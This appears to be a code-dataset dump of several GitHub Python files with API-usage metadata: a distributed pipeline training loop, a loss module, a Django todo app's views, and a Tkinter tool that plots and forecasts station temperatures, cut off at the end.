"PyQt5.QtCore.QRect", "line_number": 35, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 35, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 38, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 38, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 39, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 39, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 42, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 42, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 43, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 43, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 46, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 46, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 47, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 47, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTextEdit", "line_number": 50, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 50, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 51, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 51, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTextEdit", "line_number": 55, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 55, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 56, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 56, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTextEdit", "line_number": 60, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 60, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 61, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 61, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 65, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 65, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 66, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 66, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 69, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 69, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 70, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 70, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 73, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 73, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 74, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 74, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 79, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 79, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 80, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 80, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 84, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 84, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 85, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 85, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 89, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 89, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 90, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 90, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMenuBar", "line_number": 95, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 95, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 96, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 96, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QStatusBar", "line_number": 99, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 99, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QMetaObject.connectSlotsByName", "line_number": 104, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QMetaObject", "line_number": 104, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 104, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QCoreApplication", "line_number": 107, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 107, "usage_type": "name"}]} +{"seq_id": "17121482673", "text": "import math\nimport os\nimport time\nimport warnings\n\nimport torch\n\nfrom pipe.pipeline import SinglePartitionManager\nfrom pipe.pipeline.trainers.statistics import Stats\nfrom pipe.prepare_pipeline import SmallerLastBatchPolicy, DEFAULT_STEP_EVERY_SMALLER_LAST_BATCH_POLICY\n\n\ndef training_loop(args, logger, train_dl, test_dl,\n is_last_partition, partition: SinglePartitionManager, statistics: Stats, train_dl_len,\n test_dl_len, samplers):\n # Prepare for loop\n last_batch_smaller_n_micro_batches_policy = getattr(args, \"last_batch_smaller_n_micro_batches_policy\",\n DEFAULT_STEP_EVERY_SMALLER_LAST_BATCH_POLICY)\n\n save_checkpoint_every_x_epochs = approximate_checkpoint_every_x_epochs(args, train_dl_len)\n\n epochs = 0\n steps = 0\n total_epoch_times_list = []\n train_epochs_times_list = []\n cp_saver = CheckpointsSaver(args)\n\n logger.info(f\"flush rate {args.flush_rate}\")\n logger.info(f\"Running for {args.epochs} epochs and {args.steps} steps\")\n if args.flush_rate >= 0:\n raise NotImplementedError()\n\n train_batches_limit = getattr(args, \"train_batches_limit\", train_dl_len)\n test_batches_limit = getattr(args, \"test_batches_limit\", test_dl_len)\n\n if getattr(args, \"train_batches_limit\", -1) > 0:\n warnings.warn(\n \"(dev feature) hard limiting train batches per flush: \"\n \"different last batch not supported, messages may get truncated\")\n\n if getattr(args, \"test_batches_limit\", -1) > 0:\n warnings.warn(\n \"(dev feature) hard limiting test batches per flush: \"\n \"different last batch not supported, messages may get truncated\")\n\n train_batches_limit = train_dl_len if train_batches_limit < 0 else train_batches_limit\n test_batches_limit = test_dl_len if test_batches_limit < 0 else test_batches_limit\n\n # Here comes utility functions: run_eval and run_train\n def run_eval(eval_batches_to_run):\n logger.info(f\"Running eval\")\n if eval_batches_to_run == 0:\n partition.eval()\n if statistics:\n statistics.eval()\n return False\n if test_dl:\n partition.set_dataloader(test_dl, eval_batches_to_run)\n partition.eval()\n if statistics:\n statistics.eval()\n\n with torch.no_grad(): # TODO maybe remove this?\n partition.run_forward_until_flush(eval_batches_to_run)\n\n # eval_epochs_times_list.append(time.time() - eval_epoch_start_time)\n if is_last_partition:\n statistics.last_partition_on_epoch_end()\n # NOTE: in eval() only last partition computes statistics\n # else:\n # statistics.non_last_partition_on_epoch_end()\n return True\n\n def run_train(train_batches_to_run):\n logger.info(f\"Running train\")\n\n train_epoch_start_time = time.time()\n if train_batches_to_run == 0:\n return False\n # Set Dataloader\n if train_dl:\n partition.set_dataloader(train_dl, train_batches_to_run)\n # Start training\n partition.train()\n if statistics:\n statistics.train()\n\n if args.flush_rate > 0:\n for _ in range(0, train_batches_to_run, args.flush_rate):\n partition.run_until_flush(args.flush_rate)\n reminder = train_batches_to_run % args.flush_rate\n if reminder > 0:\n logger.info(f\"Warning: will run for reminder {reminder} to finish epoch\")\n partition.run_until_flush(reminder)\n # TODO: allow statistics between flushes (e.g eval)\n\n if not partition.trainer.PER_STEP_SCHEDULER:\n partition.lr_scheduler.step()\n else:\n partition.run_until_flush(train_batches_to_run)\n\n train_epochs_times_list.append(time.time() - train_epoch_start_time)\n\n if is_last_partition:\n statistics.last_partition_on_epoch_end()\n else:\n statistics.non_last_partition_on_epoch_end()\n return True\n\n # Actual training loop\n while epochs < args.epochs or args.epochs < 0:\n for s in samplers:\n s.set_epoch(epochs)\n\n (reminder_micro_batches,\n train_batches_limit_to_use) = get_micro_batches_until_flush(args,\n train_batches_limit,\n steps,\n last_batch_smaller_n_micro_batches_policy,\n logger, partition)\n\n if train_batches_limit_to_use <= 0:\n logger.info(\n f\"breaking early: \"\n f\" can't complete a full step with {args.step_every} gradient accumulations.\")\n break\n epoch_start_time = time.time()\n\n # TODO: flush every 1000\n did_train = run_train(train_batches_limit_to_use)\n\n did_eval = run_eval(test_batches_limit)\n\n epochs += 1\n if did_train:\n floor_steps = args.steps > 0 \\\n and reminder_micro_batches \\\n and last_batch_smaller_n_micro_batches_policy == SmallerLastBatchPolicy.DropReminder\n if floor_steps:\n steps += math.floor(train_batches_limit_to_use / args.step_every)\n else:\n steps += math.ceil(train_batches_limit_to_use / args.step_every)\n\n is_last = (0 < args.epochs <= epochs) or (0 < args.steps <= steps)\n if is_last or epochs % save_checkpoint_every_x_epochs == 0:\n cp_saver.maybe_save_checkpoint(partition.partition.layers, steps)\n\n total_epoch_time = (time.time() - epoch_start_time)\n total_epoch_times_list.append(total_epoch_time)\n # if is_last_partition\n if args.local_rank == args.world_size - 1:\n logger.info('-' * 89)\n # ms/batch {:5.2f}\n info_str = '| end of epoch {:3d} | time: {:5.2f}s | steps: {:5d}'.format(\n epochs, total_epoch_time, steps)\n if did_train:\n info_str += statistics.get_epoch_info_str(is_train=True)\n if did_eval:\n info_str += statistics.get_epoch_info_str(is_train=False)\n\n logger.info(info_str)\n logger.info('-' * 89)\n\n if 0 < args.steps <= steps:\n logger.info(\n f\"Finished all steps. Total steps:{steps}, rank:{args.local_rank}\"\n )\n break # steps condition met\n elif getattr(args, \"patience\", False):\n if args.world_size - 1:\n assert is_last_partition\n # TODO: Try catch? \n should_early_stop = should_stop_early(\n args, statistics.get_metric_for_early_stop(), logger)\n data = torch.tensor(int(should_early_stop))\n else:\n data = torch.tensor(int(False)) # create buffer\n\n torch.distributed.broadcast(data, args.world_size - 1)\n should_early_stop = data.item()\n if should_early_stop:\n break\n\n return total_epoch_times_list, train_epochs_times_list\n\n\ndef get_micro_batches_until_flush(args, train_batches_limit, steps, step_every_smaller_last_batch_policy,\n logger, partition):\n if args.steps > 0:\n steps_left = args.steps - steps\n # TODO: it can be more fine-grained depends on policy but I leave it for now.\n batches_left = steps_left * args.step_every\n train_batches_limit_to_use = min(train_batches_limit, batches_left)\n\n if batches_left < train_batches_limit:\n # Re-define last batch train shapes.\n # now, the last batch shapes are not smaller.\n logger.info(\n \"batches_left are smaller than dataloader or limit: killing comm_handler.last_batch_train_shapes\")\n partition.comm_handler.last_batch_train_shapes = None\n\n # handle step every.\n # if we don't do anything, we will do:\n # `train_batches_limit` batches\n # which are (train_batches_limit // args.step_every) steps.\n # So the reminder is problematic\n # we can either:\n # (1) take a smaller step for it (proportional to number of grad accumulations taken).\n # (2) drop the reminder\n #\n # Note: (1) only effects the last batch so there is no problem with staleness.\n\n reminder_micro_batches = train_batches_limit_to_use % args.step_every\n if reminder_micro_batches:\n if step_every_smaller_last_batch_policy == SmallerLastBatchPolicy.DropReminder:\n # d_info = {\n # \"steps_left\": steps_left,\n # \"batches_left\": batches_left,\n # \"original_train_batches_limit\": train_batches_limit,\n # \"train_batches_limit_until_flush\": train_batches_limit_to_use,\n # \"step_every\": args.step_every,\n # \"train_dl_len\": train_dl_len\n # }\n logger.info(\n f\"Got reminder of {reminder_micro_batches} micro batches. Will drop them.\")\n train_batches_limit_to_use -= reminder_micro_batches\n\n elif step_every_smaller_last_batch_policy == SmallerLastBatchPolicy.ProportionalStep:\n # TODO: to fix GPipe MPI, we can do it, but needs to be only for last batch.\n logger.info(\n f\"Got reminder of {reminder_micro_batches} micro batches. \"\n f\"Will take proportional {reminder_micro_batches / args.step_every} last step\")\n else:\n raise NotImplementedError(\n f\"Unknown SMALLER_LAST_BATCH_POLICY, {step_every_smaller_last_batch_policy}\")\n else:\n train_batches_limit_to_use = train_batches_limit\n reminder_micro_batches = 0\n return reminder_micro_batches, train_batches_limit_to_use\n\n\ndef approximate_checkpoint_every_x_epochs(args, train_dl_len):\n save_checkpoint_every_x_epochs = getattr(args, \"save_checkpoint_every_x_steps\", None)\n approx_step_per_epoch = train_dl_len // args.step_every\n if save_checkpoint_every_x_epochs is not None:\n save_checkpoint_every_x_epochs = save_checkpoint_every_x_epochs // approx_step_per_epoch\n else:\n save_checkpoint_every_x_epochs = 1\n assert save_checkpoint_every_x_epochs >= 1\n print(f\"Approximating: An epoch is approx {approx_step_per_epoch} steps.\")\n print(f\"Approximating: will save checkpoint every {save_checkpoint_every_x_epochs} epochs, and at the end.\")\n return save_checkpoint_every_x_epochs\n\n\ndef should_stop_early(args, valid_loss, logger):\n # skip check if no validation was done in the current epoch\n if valid_loss is None:\n return False\n if args.patience <= 0:\n return False\n\n def is_better(a, b):\n return a > b if getattr(args, \"maximize_best_checkpoint_metric\",\n False) else a < b\n\n prev_best = getattr(should_stop_early, \"best\", None)\n if prev_best is None or is_better(valid_loss, prev_best):\n should_stop_early.best = valid_loss\n should_stop_early.num_runs = 0\n return False\n else:\n should_stop_early.num_runs += 1\n if should_stop_early.num_runs >= args.patience:\n logger.info(\n f\"early stop since valid performance hasn't improved for last {args.patience} runs\")\n return True\n else:\n return False\n\n\nclass CheckpointsSaver:\n def __init__(self, args):\n self.args = args\n self.num_saved_checkpoints = 0\n\n if getattr(args, \"save_checkpoints\", False):\n assert hasattr(args, \"checkpoints_save_dir\")\n os.makedirs(args.checkpoints_save_dir, exist_ok=True)\n else:\n print(\"-W- will not save checkpoints\")\n # (To change this, set: args.save_checkpoints=True, args.checkpoints_save_dir\")\n\n def maybe_save_checkpoint(self, model, steps):\n args = self.args\n if not getattr(args, \"save_checkpoints\", False):\n return\n\n name_prefix = getattr(args, \"checkpoints_save_name_prefix\", \"\")\n name_prefix += f\"_{self.num_saved_checkpoints}\"\n # name_prefix += add_to_prefix\n fn = os.path.join(args.checkpoints_save_dir, f\"{name_prefix}_Partition{args.stage}.pt\")\n\n tik = time.time()\n torch.save(model.state_dict(), fn)\n tok = time.time()\n\n print(f\"-V- stage {args.stage}: saving checkpoint took: {tok - tik}\")\n self.num_saved_checkpoints += 1\n print(f\"-I- stage {args.stage}: model checkpoint saved: {fn}\")\n\n # Also save number of steps\n metatdata_fn = os.path.join(args.checkpoints_save_dir, f\"{name_prefix}_Partition{args.stage}.steps\")\n try:\n # We don't want it to kill training if it fails somehow\n with open(metatdata_fn, \"w\") as f:\n f.write(str(steps))\n except Exception as _:\n warnings.warn(f\"Failed to save metadata for checkpoint {metatdata_fn}, ignoring exception\")\n", "repo_name": "saareliad/FTPipe", "sub_path": "pipe/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 13333, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 41, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pipe.pipeline.SinglePartitionManager", "line_number": 14, "usage_type": "name"}, {"api_name": "pipe.pipeline.trainers.statistics.Stats", "line_number": 14, "usage_type": "name"}, {"api_name": "pipe.prepare_pipeline.DEFAULT_STEP_EVERY_SMALLER_LAST_BATCH_POLICY", "line_number": 18, "usage_type": "argument"}, {"api_name": "warnings.warn", "line_number": 37, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 63, "usage_type": "call"}, {"api_name": "time.time", "line_number": 77, "usage_type": "call"}, {"api_name": "time.time", "line_number": 102, "usage_type": "call"}, {"api_name": "time.time", "line_number": 127, "usage_type": "call"}, {"api_name": "pipe.prepare_pipeline.SmallerLastBatchPolicy.DropReminder", "line_number": 138, "usage_type": "attribute"}, {"api_name": "pipe.prepare_pipeline.SmallerLastBatchPolicy", "line_number": 138, "usage_type": "name"}, {"api_name": "math.floor", "line_number": 140, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 142, "usage_type": "call"}, {"api_name": "time.time", "line_number": 148, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 175, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 177, "usage_type": "call"}, {"api_name": "torch.distributed.broadcast", "line_number": 179, "usage_type": "call"}, {"api_name": "torch.distributed", "line_number": 179, "usage_type": "attribute"}, {"api_name": "pipe.prepare_pipeline.SmallerLastBatchPolicy.DropReminder", "line_number": 215, "usage_type": "attribute"}, {"api_name": "pipe.prepare_pipeline.SmallerLastBatchPolicy", "line_number": 215, "usage_type": "name"}, {"api_name": "pipe.prepare_pipeline.SmallerLastBatchPolicy.ProportionalStep", "line_number": 228, "usage_type": "attribute"}, {"api_name": "pipe.prepare_pipeline.SmallerLastBatchPolicy", "line_number": 228, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 288, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 301, "usage_type": "call"}, {"api_name": "os.path", "line_number": 301, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 303, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 304, "usage_type": "call"}, {"api_name": "time.time", "line_number": 305, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 312, "usage_type": "call"}, {"api_name": "os.path", "line_number": 312, "usage_type": "attribute"}, {"api_name": "warnings.warn", "line_number": 318, "usage_type": "call"}]} +{"seq_id": "11351989590", "text": "import torch\nfrom torch import nn\n\nclass Deid_loss(nn.Module): # Deid loss\n def __init__(self,wt1,wt2):\n super(Deid_loss,self).__init__()\n self.wt1 = wt1\n self.wt2 = wt2\n return\n\n def forward(self, preds, labels): # tensor [Batch, Temporal]\n batch_size = preds.size()[0]\n term1= -torch.mean(torch.sum(labels.view(batch_size, -1) * torch.log(preds.view(batch_size, -1)), dim=1))\n print(term1)\n exit()\n term2 = torch.sqrt(torch.sum(preds*preds,1))\n lossid = self.wt1*torch.mean(term1) #+ self.wt2*torch.mean(term2)\n return lossid\n", "repo_name": "marukosan93/De-id_rPPG", "sub_path": "utils/Loss_deid.py", "file_name": "Loss_deid.py", "file_ext": "py", "file_size_in_byte": 620, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 4, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 4, "usage_type": "name"}, {"api_name": "torch.mean", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.log", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "29055027537", "text": "from django.http import HttpResponse\nfrom django.shortcuts import render,redirect,get_object_or_404\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate\nfrom django.contrib.auth import login as LogIn\nfrom django.contrib.auth import logout as LogOut\nfrom myapp.forms import TaskForm\nfrom myapp.models import Tasks\n# Create your views here.\n\ndef index(request):\n if request.user.is_authenticated:\n tasklu=Tasks.objects.filter(owner=request.user)\n else:\n tasklu=\"no\"\n return render(request,'myapp/index.html',{'tasks':tasklu})\n\ndef signin(request):\n if request.method==\"POST\":\n try:\n user = User.objects.create(\n username=request.POST.get(\"username\"),\n password=request.POST.get(\"username\"),\n email=request.POST.get(\"email\"),\n first_name=request.POST.get(\"first_name\"),\n last_name=request.POST.get(\"last_name\")\n )\n user.save()\n except:\n return HttpResponse(\"Username Already Taken Please Try Unique Name\")\n if user:\n return render(request,'myapp/index.html')\n else:\n return render(request,'myapp/index.html',{'username':False})\n return render(request,'myapp/signin.html')\n\ndef login(request):\n if not request.user.is_authenticated:\n if request.method==\"POST\":\n use=authenticate(username=request.POST.get('username'),password=request.POST.get('password'))\n if use:\n LogIn(request,use)\n return index(request)\n else:\n return HttpResponse(\"Log in Failed\")\n else:\n return render(request,'myapp/index.html')\n return render(request,'myapp/login.html')\n\ndef logout(request):\n LogOut(request)\n return login(request)\n\ndef add_task(request):\n if request.user.is_authenticated:\n form=TaskForm()\n if request.method==\"POST\":\n form=TaskForm(request.POST)\n if form.is_valid():\n Tasks.objects.create(owner=request.user,title=request.POST.get('title'),deadline=request.POST.get('deadline'))\n Tasks.save\n return index(request)\n else:\n form=TaskForm()\n else:\n return render(request,'myapp/create_task.html',{'form':form})\n\ndef delete_task(request,pk=None):\n if(request.method==\"POST\"):\n obj=get_object_or_404(Tasks,pk=pk)\n obj.delete()\n return index(request)\n else:\n return render(request,'myapp/delete_task.html')", "repo_name": "jyothikiran843/todo", "sub_path": "myapp/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2574, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "myapp.models.Tasks.objects.filter", "line_number": 13, "usage_type": "call"}, {"api_name": "myapp.models.Tasks.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "myapp.models.Tasks", "line_number": 13, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 16, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.create", "line_number": 21, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 21, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 30, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 32, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 34, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 35, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 40, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 42, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 45, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 47, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 48, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 51, "usage_type": "call"}, {"api_name": "myapp.forms.TaskForm", "line_number": 56, "usage_type": "call"}, {"api_name": "myapp.forms.TaskForm", "line_number": 58, "usage_type": "call"}, {"api_name": "myapp.models.Tasks.objects.create", "line_number": 60, "usage_type": "call"}, {"api_name": "myapp.models.Tasks.objects", "line_number": 60, "usage_type": "attribute"}, {"api_name": "myapp.models.Tasks", "line_number": 60, "usage_type": "name"}, {"api_name": "myapp.models.Tasks.save", "line_number": 61, "usage_type": "attribute"}, {"api_name": "myapp.models.Tasks", "line_number": 61, "usage_type": "name"}, {"api_name": "myapp.forms.TaskForm", "line_number": 64, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 66, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 70, "usage_type": "call"}, {"api_name": "myapp.models.Tasks", "line_number": 70, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 74, "usage_type": "call"}]} +{"seq_id": "4769250327", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 11 22:46:07 2020\n\n@author: kookil\n\"\"\"\n\nfrom tkinter import *\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom tkinter.messagebox import *\nfrom pandas import DataFrame\nfrom tkinter import ttk\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import r2_score\nimport statsmodels.api as sm\n\n\ndef get_info(): \n location = r'754stations_infos.xlsx'\n r1=pd.read_table(\"max.txt\",sep=\"\\s+\")\n r2=pd.read_table(\"min.txt\",sep=\"\\s+\")\n r3=pd.read_table(\"平均.txt\",sep=\"\\s+\")\n st_list=[]\n s1=comvalue1.get()\n s2=comvalue2.get()\n s3=comvalue3.get()\n if s1=='' and s2=='' and s3=='':\n showinfo('提醒','请至少选择一个站台')\n if s1==s2 or s1==s3 or s2==s3:\n showinfo('提醒','请选择不同的站台')\n else:\n df = pd.read_excel(location, 0)\n num1=df[df['站名']==s1]\n a1=num1['序号']\n k1=a1.values\n num2=df[df['站名']==s2]\n a2=num2['序号']\n k2=a2.values\n s3=df[df['站名']==s3]\n a3=s3['序号']\n k3=a3.values\n k_list=np.r_[k1,k2,k3]\n for k in k_list:\n st_name='st'+str(k)\n st_list.append(st_name)\n df1=DataFrame(r1[st_list])\n df2=DataFrame(r2[st_list])\n df3=DataFrame(r3[st_list])\n dff=pd.concat([df1,df2,df3],axis=1,ignore_index=True)\n return dff\n \ndef get_zt():\n top = Tk()\n sb = Scrollbar(top)\n sb.pack(side = RIGHT, fill = Y)\n zt= pd.read_excel('754stations_infos.xlsx')\n zt=zt.values\n \n mylist = Listbox(top, yscrollcommand = sb.set )\n for i in range(754):\n mylist.insert(END,zt[i:i+1])\n \n mylist.pack( side = LEFT )\n sb.config( command = mylist.yview )\n \n root.mainloop()\n \n \ndef cal_info(): \n if r.get()==\"月平均日最高温度\":\n m_max()\n if r.get()==\"月平均日最低温度\":\n m_min()\n if r.get()==\"月平均日平均温度\":\n m_avr()\n if r.get()==\"年平均日最高温度\":\n y_max()\n if r.get()==\"年平均日最低温度\":\n y_min()\n if r.get()==\"年平均日平均温度\":\n y_avr()\n \ndef y_min():\n dff=get_info()\n l=[]\n s=[]\n for i in range(len(dff.index.values)):\n l.append(dff.index.values[i][0])\n for j in range(int(dff.shape[1]/3)):\n r1=DataFrame(dff[1+j*3]) \n r1['年份']=l\n d_m=r1.groupby('年份').min()\n x_value=d_m[1+j*3].index\n y_value=d_m[1+j*3].values\n s.append(y_value)\n pic(x_value,s)\n \ndef y_max():\n dff=get_info()\n l=[]\n s=[]\n for i in range(len(dff.index.values)):\n l.append(dff.index.values[i][0])\n for j in range(int(dff.shape[1]/3)):\n r1=DataFrame(dff[0+j*3]) \n r1['年份']=l\n d_m=r1.groupby('年份').max()\n x_value=d_m[0+j*3].index\n y_value=d_m[0+j*3].values\n s.append(y_value)\n pic(x_value,s)\n\n \n\n\ndef y_avr():\n dff=get_info()\n l=[]\n s=[]\n for i in range(len(dff.index.values)):\n l.append(dff.index.values[i][0])\n for j in range(int(dff.shape[1]/3)):\n r1=DataFrame(dff[2+j*3]) \n r1['年份']=l\n d_m=r1.groupby('年份').mean()\n x_value=d_m[2+j*3].index\n y_value=d_m[2+j*3].values\n s.append(y_value)\n pic(x_value,s)\n \n \ndef m_max():\n dff=get_info()\n l=[]\n s=[]\n for i in range(len(dff.index.values)):\n l.append(dff.index.values[i][1])\n for j in range(int(dff.shape[1]/3)):\n r1=DataFrame(dff[0+j*3]) \n r1['月份']=l\n d_m=r1.groupby('月份').max()\n x_value=d_m[0+j*3].index\n y_value=d_m[0+j*3].values\n s.append(y_value)\n pic(x_value,s)\n \n \ndef m_min():\n dff=get_info()\n l=[]\n s=[]\n for i in range(len(dff.index.values)):\n l.append(dff.index.values[i][1])\n for j in range(int(dff.shape[1]/3)):\n r1=DataFrame(dff[1+j*3]) \n r1['月份']=l\n d_m=r1.groupby('月份').min()\n x_value=d_m[1+j*3].index\n y_value=d_m[1+j*3].values\n s.append(y_value)\n pic(x_value,s)\n \n \ndef m_avr():\n dff=get_info()\n l=[]\n s=[]\n for i in range(len(dff.index.values)):\n l.append(dff.index.values[i][1])\n for j in range(int(dff.shape[1]/3)):\n r1=DataFrame(dff[2+j*3]) \n r1['月份']=l\n d_m=r1.groupby('月份').mean()\n x_value=d_m[2+j*3].index\n y_value=d_m[2+j*3].values\n s.append(y_value)\n pic(x_value,s)\n\n\ndef pic(x,y): \n plt.title(\"\")\n if len(x)==12:\n plt.xlabel(\"月份/月\")\n else:\n plt.xlabel(\"年份/年\") \n plt.ylabel(\"温度/℃\")\n plt.rcParams['axes.unicode_minus'] = False\n plt.rcParams[\"font.sans-serif\"]=[\"SimHei\"]\n if len(y)==1:\n plt.plot(x,y[0])\n plt.legend(comvalue1.get())\n elif len(y)==2:\n plt.plot(x,y[0])\n plt.plot(x,y[1])\n plt.legend([comvalue1.get(), comvalue2.get()])\n else:\n plt.plot(x,y[0])\n plt.plot(x,y[1])\n plt.plot(x,y[2])\n plt.legend([comvalue1.get(), comvalue2.get(),comvalue3.get()])\n plt.grid()\n plt.show()\n\ndef yc():\n dff=get_info()\n dff=DataFrame(dff[2])\n Enum=E1.get()\n if Enum=='':\n showinfo(\"警告\",\"请确保年份的输入!\")\n l=[]\n for i in range (len(dff.index)):\n s=dff.index[i][0]\n l.append(s)\n dff['年份']=l\n y_yc1=dff.groupby(\"年份\").mean()\n plt.title(\"mean\")\n plt.rcParams['axes.unicode_minus'] = False\n plt.rcParams[\"font.sans-serif\"]=[\"SimHei\"]\n plt.scatter(y_yc1.index,y_yc1.values, c='black')\n plt.xlabel(\"年份\")\n plt.ylabel(\"温度\")\n X = y_yc1.index.values.reshape(-1,1)\n y =y_yc1.values.reshape(-1,1)\n reg = LinearRegression()\n reg.fit(X, y)\n print(\"平均气温线性回归方程是: Y = {:.5} + {:.5}X\".format(reg.intercept_[0], reg.coef_[0][0]))\n Enum_r=reg.intercept_[0]+ reg.coef_[0][0]*int(Enum)\n print(\"{}年温度约等于{}度\".format(int(Enum),int(Enum_r)))\n predictions = reg.predict(X)\n plt.plot(y_yc1.index, predictions, c='blue', linewidth=2)\n plt.show()\n \ndef about_call():\n showinfo('帮助','1.月平均指横轴为月份,年平均指横轴为年份。2.每次选择完数据之后需要点击获取数据')\n \nroot = 